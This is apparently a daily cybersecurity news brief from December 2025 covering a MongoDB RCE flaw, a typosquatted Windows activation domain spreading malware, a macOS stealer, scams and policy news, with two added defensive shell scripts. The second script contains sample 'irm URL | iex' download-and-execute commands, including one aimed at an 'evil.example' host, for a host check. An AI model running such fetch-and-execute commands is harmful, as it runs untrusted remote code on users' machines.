Svoboda Cybersecurity Brief December 25, 2025


Singing River Health System shuts down patient records access due to cyber incident

Singing River Health System in Mississippi proactively shut down access to patient medical records and MyChart after detecting a potential cyberattack. The health system, previously breached by Rhysida in 2023 (affecting 900,000 patients), has not confirmed a breach or attributed the incident to a threat actor.
Source: DataBreaches.net

MongoDB warns of high-severity RCE flaw (CVE-2025-14847) affecting multiple versions

A high-severity vulnerability in MongoDB allows unauthenticated RCE due to improper handling of zlib-compressed network messages. Affected versions include MongoDB 8.2.0-8.2.2, 8.0.0-8.0.16, and older unsupported versions (4.4.0-4.4.29).
Impact: Remote code execution leading to potential server compromise.
Mitigation: Upgrade to the patched releases (8.2.3, 8.0.17, etc.) or, until you can, remove zlib from the server's allowed network message compressors.
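The following POSIX shell script is an added example (not from the brief or from MongoDB) of how an operator would triage this item on a fleet: it parses the first line of `mongod --version` output, classifies the version against the affected ranges listed above, names the upgrade target for the branch, and prints the interim mitigation of dropping zlib from the server's negotiated compressors. Assumptions: the ranges and fixed versions are exactly those stated in this item (check the vendor advisory for other branches); the sample `db version v8.2.1` line is constructed; `--networkMessageCompressors` and `net.compression.compressors` are MongoDB's documented server options, verify the spelling against your version's docs before rolling them out.

```shell
#!/bin/sh
# Added example: triage a mongod version against the affected ranges in the
# brief and print the mitigation. Not MongoDB's own tooling.

# ver_key X.Y.Z -> single integer for numeric comparison (8.2.1 -> 8002001).
# A trailing suffix such as "-rc0" on the patch field is ignored.
ver_key() {
    IFS=. read -r maj min pat <<EOF
$1
EOF
    pat=${pat%%[!0-9]*}
    printf '%d' $(( ${maj:-0} * 1000000 + ${min:-0} * 1000 + ${pat:-0} ))
}

# in_range VERSION LOW HIGH: true when LOW <= VERSION <= HIGH
in_range() {
    v=$(ver_key "$1"); lo=$(ver_key "$2"); hi=$(ver_key "$3")
    [ "$v" -ge "$lo" ] && [ "$v" -le "$hi" ]
}

# mongo_affected VERSION: true if VERSION is in a range the brief lists as
# affected (assumed: 8.2.0-8.2.2, 8.0.0-8.0.16, 4.4.0-4.4.29).
mongo_affected() {
    in_range "$1" 8.2.0 8.2.2 \
        || in_range "$1" 8.0.0 8.0.16 \
        || in_range "$1" 4.4.0 4.4.29
}

# fixed_version VERSION: upgrade target for the branch, per the brief
fixed_version() {
    case "$1" in
        8.2.*) echo 8.2.3 ;;
        8.0.*) echo 8.0.17 ;;
        4.4.*) echo "none: 4.4 is unsupported, migrate to a supported branch" ;;
        *)     echo "not covered by the ranges listed here; check the advisory" ;;
    esac
}

# parse_mongod_version LINE: extract "8.2.1" from "db version v8.2.1"
parse_mongod_version() {
    printf '%s\n' "$1" | sed -n 's/^db version v\([0-9.]*\).*/\1/p'
}

# Constructed sample of the first line printed by `mongod --version`.
SAMPLE_VERSION_OUTPUT='db version v8.2.1'

ver=$(parse_mongod_version "$SAMPLE_VERSION_OUTPUT")
if mongo_affected "$ver"; then
    echo "mongod $ver is in an affected range; upgrade to $(fixed_version "$ver")"
    echo "Interim mitigation: stop negotiating zlib on the server, e.g."
    echo "  mongod --networkMessageCompressors snappy,zstd"
    echo "  (mongod.conf equivalent: net.compression.compressors: snappy,zstd)"
else
    echo "mongod $ver is not in the affected ranges listed in the brief"
fi
```

Run it against real output with `parse_mongod_version "$(mongod --version | head -n1)"`. The zlib removal only blocks the vulnerable compression path; clients that are pinned to zlib will fall back to another negotiated compressor or to uncompressed traffic, so it is a stopgap, not a substitute for the upgrade.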
Source: BleepingComputer

FBI seizes domain storing stolen US bank credentials

The FBI seized “web3adspanels.org,” a domain hosting bank login credentials stolen via phishing ads on Google/Bing. The scheme caused $14.6M in losses (attempted: $28M) and targeted 19+ US victims.
Source: BleepingComputer

Fake MAS Windows activation domain delivers Cosmali Loader malware

A typosquatted domain (“get.activate[.]win”) mimicking the legitimate Microsoft Activation Scripts (MAS) tool distributed PowerShell malware (Cosmali Loader), which deploys cryptominers and XWorm RAT.
Impact: System compromise via malicious payloads.
Mitigation: Verify command sources, avoid retyping commands, and use sandbox testing.
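The "verify command sources" advice above boils down to one mechanical check: before running a copied download-and-execute one-liner, extract the host it fetches from and compare it exactly with the host you trust. The POSIX shell script below is an added example (not from the brief, from BleepingComputer, or from the MAS project) of that check. Assumptions: `EXPECTED_HOST` is set to `get.activated.win`, which the author of this example takes to be the legitimate MAS host, verified out of band; the brief itself only names the lookalike `get.activate[.]win`. The command strings are constructed samples.

```shell
#!/bin/sh
# Added example: refuse to run a pasted "download and execute" command unless
# the URL host matches a pinned, out-of-band verified value exactly.
# Not the MAS project's code.

# Assumed legitimate host; confirm it yourself before relying on this value.
EXPECTED_HOST='get.activated.win'

# url_host CMD: print the host of the first http(s) URL in CMD, lowercased.
# Everything up to the next "/", whitespace or "|" counts as the host, so a
# userinfo trick such as https://trusted@evil.example/ is NOT collapsed to
# "trusted"; it stays "trusted@evil.example" and fails the comparison.
url_host() {
    printf '%s\n' "$1" \
        | sed -n 's#.*https\{0,1\}://\([^/[:space:]|]*\).*#\1#p' \
        | tr 'A-Z' 'a-z'
}

# check_cmd CMD: true only when the URL host equals EXPECTED_HOST exactly.
# A near miss (one letter dropped, as in the typosquat above) is a failure.
check_cmd() {
    host=$(url_host "$1")
    [ -n "$host" ] && [ "$host" = "$EXPECTED_HOST" ]
}

# Constructed sample commands, one per line: the intended one, the typosquat
# from the brief, a userinfo disguise, and a mixed-case copy.
SAMPLES='irm https://get.activated.win | iex
irm https://get.activate.win | iex
irm https://get.activated.win@evil.example/ | iex
irm https://Get.Activated.WIN | iex'

printf '%s\n' "$SAMPLES" | while IFS= read -r cmd; do
    if check_cmd "$cmd"; then
        echo "OK       $cmd"
    else
        echo "REJECT   $cmd   (host: $(url_host "$cmd"))"
    fi
done
```

The comparison is deliberately an exact string match rather than a "looks similar" heuristic: the whole point of a typosquat is that it looks similar, so the only safe reference is the exact host you recorded from a trusted source. Pipe the script's input from your clipboard rather than retyping the command, which is how the one-letter difference slips in.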
Source: BleepingComputer

MacSync macOS stealer abuses signed app to bypass Gatekeeper

A new MacSync variant (rebranded Mac.c stealer) was distributed via a notarized Swift app (“zk-call-messenger-installer-3.9.2-lts.dmg”) with evasion tactics like inflated DMG size (25.5MB) and encoded scripts.
Impact: Data theft and RAT capabilities.
Mitigation: Verify app signatures, avoid untrusted downloads.
Source: The Hacker News

Nomani investment scam surges 62% using AI deepfake ads

ESET reported a 62% rise in Nomani scam campaigns using AI-generated videos and fake social media ads (64,000+ blocked URLs). Victims are lured into fake crypto investments and later extorted.
Source: The Hacker News

Pro-Russian hackers claim DDoS attack on French postal service

NoName057(16) targeted La Poste, disrupting package tracking and online payments during peak season. The group is linked to previous attacks on NATO and French government sites.
Source: SecurityWeek

SEC charges operators of $14M crypto scam built on fake AI investment tips

Fraudsters impersonated financial professionals on WhatsApp, promoting fake AI trading platforms (Morocoin, Berge, Cirkor) and fictitious “Security Token Offerings.” Victims lost $14M via offshore transfers.
Source: The Hacker News

Healthcare industry pushes back on HIPAA Security Rule overhaul

100+ organizations, led by CHIME, oppose proposed HIPAA updates citing “unreasonable deadlines” and financial burdens. Changes include mandatory MFA, network segmentation, and compliance audits.
Source: DataBreaches.net

Italy fines Apple $116M over restrictive ATT privacy rules

Italy’s AGCM ruled Apple’s App Tracking Transparency framework unfairly burdens third-party developers with double consent prompts, disadvantaging ad-dependent apps. Apple plans to appeal.
Source: The Hacker News

CISA loses PRNI lead amid forced reassignment

David Stern, architect of CISA’s Pre-Ransomware Notification Initiative, resigned after refusing a transfer to FEMA. The program alerts organizations to imminent ransomware attacks.
Source: DataBreaches.net

Share this brief: https://svo.bz/w2RX
